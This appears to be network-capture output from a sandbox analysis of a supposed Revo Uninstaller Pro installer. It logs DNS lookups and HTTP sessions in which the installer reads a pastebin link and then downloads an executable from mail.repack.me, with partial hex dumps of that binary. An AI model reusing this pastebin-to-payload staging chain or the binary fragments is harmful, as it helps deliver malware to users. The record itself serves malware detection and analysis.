                                                                                                                                            Dec 9, 2024 17:40:09.793682098 CET49717443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:09.793690920 CET44349717107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:09.793813944 CET49717443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:09.793819904 CET44349717107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:09.867208004 CET44349719107.167.96.36192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:09.867291927 CET49719443192.168.2.9107.167.96.36
                                                                                                                                            Dec 9, 2024 17:40:09.927707911 CET49719443192.168.2.9107.167.96.36
                                                                                                                                            Dec 9, 2024 17:40:09.927731991 CET44349719107.167.96.36192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:09.928096056 CET44349719107.167.96.36192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:09.928160906 CET49719443192.168.2.9107.167.96.36
                                                                                                                                            Dec 9, 2024 17:40:09.928594112 CET49719443192.168.2.9107.167.96.36
                                                                                                                                            Dec 9, 2024 17:40:09.971326113 CET44349719107.167.96.36192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:10.012649059 CET44349718107.167.110.216192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:10.012672901 CET44349718107.167.110.216192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:10.012731075 CET44349718107.167.110.216192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:10.012756109 CET49718443192.168.2.9107.167.110.216
                                                                                                                                            Dec 9, 2024 17:40:10.012756109 CET49718443192.168.2.9107.167.110.216
                                                                                                                                            Dec 9, 2024 17:40:10.012789011 CET49718443192.168.2.9107.167.110.216
                                                                                                                                            Dec 9, 2024 17:40:10.030272007 CET49718443192.168.2.9107.167.110.216
                                                                                                                                            Dec 9, 2024 17:40:10.030308008 CET44349718107.167.110.216192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:10.247356892 CET44349717107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:10.247422934 CET49717443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:10.247437000 CET44349717107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:10.247616053 CET49717443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:10.247617006 CET49717443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:10.247648001 CET44349717107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:10.247661114 CET49717443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:10.247704983 CET49717443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:10.248725891 CET49720443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:10.248764038 CET44349720107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:10.248925924 CET49720443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:10.249166965 CET49720443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:10.249176979 CET44349720107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:10.314476967 CET44349719107.167.96.36192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:10.314547062 CET44349719107.167.96.36192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:10.314610004 CET49719443192.168.2.9107.167.96.36
                                                                                                                                            Dec 9, 2024 17:40:10.317531109 CET49719443192.168.2.9107.167.96.36
                                                                                                                                            Dec 9, 2024 17:40:10.317562103 CET44349719107.167.96.36192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:11.810245991 CET44349720107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:11.814608097 CET49720443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:11.814608097 CET49720443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:11.814634085 CET44349720107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:11.818069935 CET49720443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:11.818088055 CET44349720107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:12.292654037 CET44349720107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:12.292735100 CET49720443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:12.292756081 CET44349720107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:12.292795897 CET49720443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:12.292800903 CET44349720107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:12.292824030 CET44349720107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:12.292836905 CET49720443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:12.292860985 CET49720443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:12.292967081 CET49720443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:12.292982101 CET44349720107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:12.292990923 CET49720443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:12.293034077 CET49720443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:12.293987989 CET49722443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:12.294013977 CET44349722107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:12.294070959 CET49722443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:12.294337034 CET49722443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:12.294347048 CET44349722107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:13.946839094 CET44349722107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:13.946953058 CET49722443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:13.947527885 CET49722443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:13.947540998 CET44349722107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:13.947698116 CET49722443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:13.947704077 CET44349722107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:14.418596029 CET44349722107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:14.418685913 CET49722443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:14.418701887 CET44349722107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:14.418740034 CET49722443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:14.418762922 CET44349722107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:14.418804884 CET49722443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:14.418807983 CET44349722107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:14.418826103 CET49722443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:14.418832064 CET44349722107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:14.418852091 CET49722443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:14.418894053 CET49722443192.168.2.9107.167.125.189
                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Dec 9, 2024 17:39:31.457123995 CET5567053192.168.2.91.1.1.1
                                                                                                                                            Dec 9, 2024 17:39:31.596836090 CET53556701.1.1.1192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:33.958148956 CET5966753192.168.2.91.1.1.1
                                                                                                                                            Dec 9, 2024 17:39:34.196868896 CET53596671.1.1.1192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:55.921753883 CET6023653192.168.2.91.1.1.1
                                                                                                                                            Dec 9, 2024 17:39:56.586894035 CET53602361.1.1.1192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:05.065732002 CET6118353192.168.2.91.1.1.1
                                                                                                                                            Dec 9, 2024 17:40:05.066545010 CET5077053192.168.2.91.1.1.1
                                                                                                                                            Dec 9, 2024 17:40:05.067073107 CET4958753192.168.2.91.1.1.1
                                                                                                                                            Dec 9, 2024 17:40:05.206352949 CET53507701.1.1.1192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:05.207856894 CET53611831.1.1.1192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:05.843278885 CET53495871.1.1.1192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:07.815080881 CET5155153192.168.2.91.1.1.1
                                                                                                                                            Dec 9, 2024 17:40:08.109826088 CET5302953192.168.2.91.1.1.1
                                                                                                                                            Dec 9, 2024 17:40:08.352540016 CET53515511.1.1.1192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:08.617971897 CET53530291.1.1.1192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:10.326318026 CET5791053192.168.2.91.1.1.1
                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                            Dec 9, 2024 17:39:31.457123995 CET192.168.2.91.1.1.10xd17Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:39:33.958148956 CET192.168.2.91.1.1.10x40f9Standard query (0)mail.repack.meA (IP address)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:39:55.921753883 CET192.168.2.91.1.1.10xeab9Standard query (0)net.geo.opera.comA (IP address)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:05.065732002 CET192.168.2.91.1.1.10x9c41Standard query (0)autoupdate.opera.comA (IP address)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:05.066545010 CET192.168.2.91.1.1.10xad0eStandard query (0)autoupdate.geo.opera.comA (IP address)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:05.067073107 CET192.168.2.91.1.1.10xa643Standard query (0)desktop-netinstaller-sub.osp.opera.softwareA (IP address)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:07.815080881 CET192.168.2.91.1.1.10x2bcaStandard query (0)features.opera-api2.comA (IP address)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:08.109826088 CET192.168.2.91.1.1.10x3adaStandard query (0)download.opera.comA (IP address)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:10.326318026 CET192.168.2.91.1.1.10xf865Standard query (0)download3.operacdn.comA (IP address)IN (0x0001)false
                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                            Dec 9, 2024 17:39:31.596836090 CET1.1.1.1192.168.2.90xd17No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:39:31.596836090 CET1.1.1.1192.168.2.90xd17No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:39:31.596836090 CET1.1.1.1192.168.2.90xd17No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:39:34.196868896 CET1.1.1.1192.168.2.90x40f9No error (0)mail.repack.me194.87.189.43A (IP address)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:39:56.586894035 CET1.1.1.1192.168.2.90xeab9No error (0)net.geo.opera.comna.net.opera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:39:56.586894035 CET1.1.1.1192.168.2.90xeab9No error (0)na.net.opera.comtrn.lb.opera.technologyCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:39:56.586894035 CET1.1.1.1192.168.2.90xeab9No error (0)trn.lb.opera.technology107.167.96.30A (IP address)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:39:56.586894035 CET1.1.1.1192.168.2.90xeab9No error (0)trn.lb.opera.technology107.167.96.31A (IP address)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:05.206352949 CET1.1.1.1192.168.2.90xad0eNo error (0)autoupdate.geo.opera.comna-autoupdate.opera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:05.206352949 CET1.1.1.1192.168.2.90xad0eNo error (0)na-autoupdate.opera.com107.167.96.39A (IP address)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:05.206352949 CET1.1.1.1192.168.2.90xad0eNo error (0)na-autoupdate.opera.com107.167.96.38A (IP address)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:05.207856894 CET1.1.1.1192.168.2.90x9c41No error (0)autoupdate.opera.comautoupdate.geo.opera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:05.207856894 CET1.1.1.1192.168.2.90x9c41No error (0)autoupdate.geo.opera.comna-autoupdate.opera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:05.207856894 CET1.1.1.1192.168.2.90x9c41No error (0)na-autoupdate.opera.com107.167.96.38A (IP address)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:05.207856894 CET1.1.1.1192.168.2.90x9c41No error (0)na-autoupdate.opera.com107.167.96.39A (IP address)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:05.843278885 CET1.1.1.1192.168.2.90xa643No error (0)desktop-netinstaller-sub.osp.opera.softwaresubmit-target.osp.opera.softwareCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:05.843278885 CET1.1.1.1192.168.2.90xa643No error (0)submit-target.osp.opera.softwaresubmit.geo.opera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:05.843278885 CET1.1.1.1192.168.2.90xa643No error (0)submit.geo.opera.comsubmit-trn.osp.opera.softwareCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:05.843278885 CET1.1.1.1192.168.2.90xa643No error (0)submit-trn.osp.opera.software107.167.125.189A (IP address)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:08.352540016 CET1.1.1.1192.168.2.90x2bcaNo error (0)features.opera-api2.comfeatures-2.geo.opera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:08.352540016 CET1.1.1.1192.168.2.90x2bcaNo error (0)features-2.geo.opera.comus-features.opera-api2.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:08.352540016 CET1.1.1.1192.168.2.90x2bcaNo error (0)us-features.opera-api2.comlati.lb.opera.technologyCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:08.352540016 CET1.1.1.1192.168.2.90x2bcaNo error (0)lati.lb.opera.technology107.167.110.216A (IP address)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:08.352540016 CET1.1.1.1192.168.2.90x2bcaNo error (0)lati.lb.opera.technology107.167.110.211A (IP address)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:08.617971897 CET1.1.1.1192.168.2.90x3adaNo error (0)download.opera.comdownload.geo.opera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:08.617971897 CET1.1.1.1192.168.2.90x3adaNo error (0)download.geo.opera.comna-download.opera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:08.617971897 CET1.1.1.1192.168.2.90x3adaNo error (0)na-download.opera.com107.167.96.36A (IP address)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:08.617971897 CET1.1.1.1192.168.2.90x3adaNo error (0)na-download.opera.com107.167.96.37A (IP address)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:10.551424026 CET1.1.1.1192.168.2.90xf865No error (0)download3.operacdn.comv2.download3.operacdn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            • pastebin.com
                                                                                                                                            • mail.repack.me
                                                                                                                                            • net.geo.opera.com
                                                                                                                                            • autoupdate.geo.opera.com
                                                                                                                                            • autoupdate.opera.com
                                                                                                                                            • desktop-netinstaller-sub.osp.opera.software
                                                                                                                                            • features.opera-api2.com
                                                                                                                                            • download.opera.com
                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            0192.168.2.949709104.20.4.2354437668C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-09 16:39:33 UTC133OUTGET /raw/vkwZzU9B HTTP/1.1
                                                                                                                                            User-Agent: NSIS_Inetc (Mozilla)
                                                                                                                                            Host: pastebin.com
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            2024-12-09 16:39:33 UTC391INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 09 Dec 2024 16:39:33 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            x-frame-options: DENY
                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                            x-xss-protection: 1;mode=block
                                                                                                                                            cache-control: public, max-age=1801
                                                                                                                                            CF-Cache-Status: EXPIRED
                                                                                                                                            Last-Modified: Mon, 09 Dec 2024 16:39:33 GMT
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8ef66e915a3a8c7b-EWR
                                                                                                                                            2024-12-09 16:39:33 UTC41INData Raw: 32 33 0d 0a 68 74 74 70 73 3a 2f 2f 6d 61 69 6c 2e 72 65 70 61 63 6b 2e 6d 65 2f 74 73 6a 74 6d 66 64 6d 2e 70 6b 67 0d 0a
                                                                                                                                            Data Ascii: 23https://mail.repack.me/tsjtmfdm.pkg
                                                                                                                                            2024-12-09 16:39:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            1192.168.2.949710194.87.189.434437668C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-09 16:39:35 UTC135OUTGET /tsjtmfdm.pkg HTTP/1.1
                                                                                                                                            User-Agent: NSIS_Inetc (Mozilla)
                                                                                                                                            Host: mail.repack.me
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            2024-12-09 16:39:36 UTC283INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.26.2
                                                                                                                                            Date: Mon, 09 Dec 2024 16:39:36 GMT
                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                            Content-Length: 419886
                                                                                                                                            Last-Modified: Mon, 28 Oct 2024 17:07:02 GMT
                                                                                                                                            Connection: close
                                                                                                                                            ETag: "671fc4b6-6682e"
                                                                                                                                            Alt-Svc: h3=":443"; ma=86400
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-12-09 16:39:36 UTC16101INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 62 60 f7 f7 26 01 99 a4 26 01 99 a4 26 01 99 a4 92 9d 68 a4 2b 01 99 a4 92 9d 6a a4 ab 01 99 a4 92 9d 6b a4 3e 01 99 a4 b8 a1 5e a4 24 01 99 a4 1d 5f 9a a5 30 01 99 a4 1d 5f 9d a5 35 01 99 a4 1d 5f 9c a5 0a 01 99 a4 2f 79 1a a4 2c 01 99 a4 2f 79 0a a4 23 01 99 a4 26 01 98 a4 2c 00 99 a4 b1 5f 9c a5 17 01 99 a4 b1 5f 99 a5 27 01 99 a4 b4 5f 66 a4 27 01 99 a4 b1 5f 9b a5 27 01 99
                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$b`&&&h+jk>^$_0_5_/y,/y#&,__'_f'_'
                                                                                                                                            2024-12-09 16:39:36 UTC16384INData Raw: 6e 44 24 24 66 0f 62 f8 66 0f 70 e9 93 66 0f 6e 4c 24 18 66 0f 62 ca 66 0f 62 f9 66 0f fe 7c 24 50 66 0f 6e 4c 24 14 66 0f fe fd 66 0f ef df 66 0f 6e d7 0f 28 c3 66 0f 62 ca 66 0f 72 d0 10 66 0f 72 f3 10 66 0f ef c3 66 0f 6e 5c 24 2c 0f 28 f0 0f 29 44 24 60 66 0f fe f4 0f 28 c6 66 0f ef c5 0f 28 e0 66 0f 72 d0 0c 66 0f 72 f4 14 66 0f ef e0 66 0f 6e 44 24 20 66 0f 62 d8 0f 28 44 24 60 66 0f 62 d9 66 0f fe df 66 0f fe dc 66 0f ef c3 0f 29 5c 24 50 0f 28 d8 66 0f 72 d0 08 66 0f 72 f3 18 66 0f ef d8 0f 28 d3 66 0f fe d6 0f 28 c2 66 0f ef c4 0f 28 c8 66 0f 72 d0 07 66 0f 72 f1 19 66 0f ef c8 66 0f 6e 7c 24 34 66 0f 6e 44 24 1c 66 0f 62 f8 66 0f 70 e9 39 66 0f 6e 4c 24 0c 66 0f 70 e2 4e 66 0f 6e 54 24 28 66 0f 62 ca 66 0f 62 f9 66 0f fe 7c 24 50 66 0f 70 db 93
                                                                                                                                            Data Ascii: nD$$fbfpfnL$fbfbf|$PfnL$fffn(fbfrfrffn\$,()D$`f(f(frfrffnD$ fb(D$`fbfff)\$P(frfrf(f(f(frfrffn|$4fnD$fbfp9fnL$fpNfnT$(fbfbf|$Pfp
                                                                                                                                            2024-12-09 16:39:36 UTC16384INData Raw: ff b0 d8 82 00 00 ff 36 e8 36 1c 00 00 8b 47 08 8d 8f a0 00 00 00 ff b0 d8 82 00 00 ff 36 e8 20 1c 00 00 8b 83 d8 32 00 00 8d 77 10 8b 8b dc 32 00 00 89 47 30 8d 85 a0 de ff ff 50 89 4f 34 8b ce 53 e8 50 3b 00 00 8a 55 f1 33 c9 8a 45 0b 88 57 39 88 47 3a 89 4d e4 89 4d d8 84 d2 0f 85 9d 00 00 00 38 8b c4 6c 00 00 0f 85 91 00 00 00 8b b3 e4 32 00 00 8b 93 e0 32 00 00 3b f1 7c 7e 7f 08 81 fa 40 42 0f 00 76 74 8b 8b d8 32 00 00 8b 83 dc 32 00 00 0f a4 c8 0a c1 e1 0a 3b c6 7c 58 7f 04 3b ca 76 52 33 c0 3b f0 7c 23 7f 08 81 fa 00 e1 f5 05 72 19 8b cb e8 3f 0b 00 00 3b 93 dc 32 00 00 7c 33 7f 08 3b 83 d8 32 00 00 76 29 ff b3 e4 32 00 00 8d 8d a0 de ff ff ff b3 e0 32 00 00 e8 0a 0d 00 00 8b 83 e0 32 00 00 89 45 e4 8b 83 e4 32 00 00 89 45 d8 8a 45 0b 33 c9 8d 77
                                                                                                                                            Data Ascii: 66G6 2w2G0PO4SP;U3EW9G:MM8l22;|~@Bvt22;|X;vR3;|#r?;2|3;2v)222E2EE3w
                                                                                                                                            2024-12-09 16:39:36 UTC16384INData Raw: ff 83 3e 00 74 3c 6b 46 08 0c 50 ff 36 57 e8 88 1f 01 00 6b 46 08 0c 83 c4 0c 50 ff 36 e8 50 1e 00 00 ff 36 e8 40 60 01 00 59 eb 16 ff 36 e8 46 60 01 00 8b f8 59 59 85 ff 75 07 8b cd e8 13 a2 ff ff 89 3e 5f 5d 89 5e 08 5b 5e c2 04 00 55 8b ec 8b 55 0c 83 ec 0c 80 3a 00 53 56 57 8b d9 74 78 8b 45 08 52 89 45 f4 e8 4e ae 01 00 59 8b 4d 10 89 45 f8 8b 45 14 6a 22 5f 85 c0 74 32 8d 50 ff 8d 14 51 0f b7 32 83 fe 20 74 05 83 fe 09 75 0d 33 f6 66 89 32 83 ea 02 83 e8 01 75 e6 85 c0 74 0e 66 39 7c 41 fe 75 07 33 d2 66 89 54 41 fe 33 d2 66 89 14 41 66 39 39 75 03 83 c1 02 51 e8 e3 9a 01 00 51 51 8b fc 89 45 fc 8d 75 f4 8d 4b 28 a5 a5 a5 e8 e1 0a 00 00 5f 5e 5b 8b e5 5d c2 10 00 55 8d 6c 24 90 8b 45 78 81 ec a0 00 00 00 8b 08 8b 45 7c 56 57 6b f9 0c 8b 30 8d 45 d0
                                                                                                                                            Data Ascii: >t<kFP6WkFP6P6@`Y6F`YYu>_]^[^UU:SVWtxERENYMEEj"_t2PQ2 tu3f2utf9|Au3fTA3fAf99uQQQEuK(_^[]Ul$ExE|VWk0E
                                                                                                                                            2024-12-09 16:39:36 UTC16384INData Raw: e8 93 9a 00 00 83 c4 0c e9 13 02 00 00 ff 36 68 30 30 43 00 68 38 30 43 00 eb e5 6a 00 e8 4e 92 00 00 59 e9 f8 01 00 00 ff 76 04 6a 7b e8 2b cf ff ff 50 ff 36 eb c9 ff 76 04 6a 7a eb ef ff 76 04 6a 7c eb e8 ff 76 04 68 ca 00 00 00 eb de 6a 70 e8 07 cf ff ff 50 6a 00 e8 3a 9a 00 00 59 eb c1 ff 76 04 6a 72 eb c5 ff 76 04 6a 78 eb be ff 36 68 85 00 00 00 e8 e2 ce ff ff 50 eb 80 ff 36 68 04 02 00 00 eb ef ff 76 04 68 84 00 00 00 eb 9c ff 76 04 68 83 00 00 00 eb 92 ff 76 08 ff 76 04 68 d2 00 00 00 e8 b2 ce ff ff 50 ff 36 e8 e5 99 00 00 83 c4 10 e9 65 01 00 00 ff 76 04 6a 79 e9 68 ff ff ff ff 76 04 68 dc 00 00 00 e9 5b ff ff ff ff 36 68 dd 00 00 00 eb 9b 83 f8 38 0f 8f ba 00 00 00 0f 84 ad 00 00 00 83 e8 17 83 f8 0b 0f 87 2a 01 00 00 ff 24 85 63 0d 41 00 68 de
                                                                                                                                            Data Ascii: 6h00Ch80CjNYvj{+P6vjzvj|vhjpPj:Yvjrvjx6hP6hvhvhvvhP6evjyhvh[6h8*$cAh
                                                                                                                                            2024-12-09 16:39:36 UTC16384INData Raw: 02 8b c8 51 ff 74 24 14 8b 0e e8 d3 7d ff ff 01 be 58 4c 00 00 11 9e 5c 4c 00 00 5f 5e 5b c2 08 00 83 ec 0c 83 3d 7c 74 44 00 00 53 55 56 8b f1 57 89 74 24 10 75 51 83 64 24 14 00 33 ff 33 ed 8b 1c bd f0 d0 43 00 85 db 7e 37 33 c0 8b cf 40 d3 e0 53 89 44 24 1c 8d 85 78 75 44 00 57 50 e8 d7 9d 00 00 8b 44 24 20 83 c4 0c 8b 4c 24 18 89 04 ad 78 74 44 00 45 03 c1 83 eb 01 75 f1 89 44 24 14 47 83 ff 13 72 b8 80 be 50 4c 00 00 00 c6 86 60 4c 00 00 01 75 39 ff 74 24 20 8b ce e8 50 f7 ff ff 8b ce e8 04 f8 ff ff 84 c0 0f 84 7d 0c 00 00 80 7c 24 20 00 74 09 80 be 61 e6 00 00 00 75 0f 8b ce e8 a0 ea ff ff 84 c0 0f 84 5e 0c 00 00 8b 86 dc e6 00 00 8d 5e 04 21 46 7c 8b 03 3b 86 88 00 00 00 7e 0f 8b ce e8 c0 f7 ff ff 84 c0 0f 84 32 0c 00 00 8b 8e 80 00 00 00 8b c1 2b
                                                                                                                                            Data Ascii: Qt$}XL\L_^[=|tDSUVWt$uQd$33C~73@SD$xuDWPD$ L$xtDEuD$GrPL`Lu9t$ P}|$ tau^^!F|;~2+
                                                                                                                                            2024-12-09 16:39:36 UTC16384INData Raw: 00 00 8b f8 89 7c 24 14 59 59 85 ff 75 07 8b c5 e9 e1 00 00 00 53 56 68 18 33 43 00 57 e8 77 c2 00 00 57 e8 26 a0 00 00 8b d8 83 c4 0c 33 c0 8b f5 66 39 45 00 0f 84 aa 00 00 00 6a 0d 59 6a 0a 5a 0f b7 06 66 3b c1 75 5c 66 39 56 02 75 56 6a 0d 5a 8d 4e 04 66 39 11 6a 0a 89 4c 24 14 5a 75 44 66 39 56 06 75 3e 52 8d 2c 5f 5f 66 39 7e 06 75 26 68 e4 32 43 00 55 e8 1c c2 00 00 8b 74 24 18 83 c3 04 59 59 6a 0d 8d 46 04 83 c5 08 59 89 44 24 10 66 39 08 74 d4 8b 7c 24 14 83 c6 02 8b 6c 24 1c eb 25 3b f5 76 26 6a 20 59 66 3b c1 75 1e 66 39 4e fe 75 18 8d 04 5f 68 88 33 43 00 50 e8 d4 c1 00 00 59 59 83 c3 06 6a 0a 5a eb 05 66 89 04 5f 43 83 c6 02 33 c0 6a 0d 59 66 39 06 0f 85 5c ff ff ff 33 c0 55 66 89 04 5f e8 78 9f 00 00 59 5e 8b c7 5b 5f 5d 59 59 c2 04 00 55 8b
                                                                                                                                            Data Ascii: |$YYuSVh3CWwW&3f9EjYjZf;u\f9VuVjZNf9jL$ZuDf9Vu>R,__f9~u&h2CUt$YYjFYD$f9t|$l$%;v&j Yf;uf9Nu_h3CPYYjZf_C3jYf9\3Uf_xY^[_]YYU
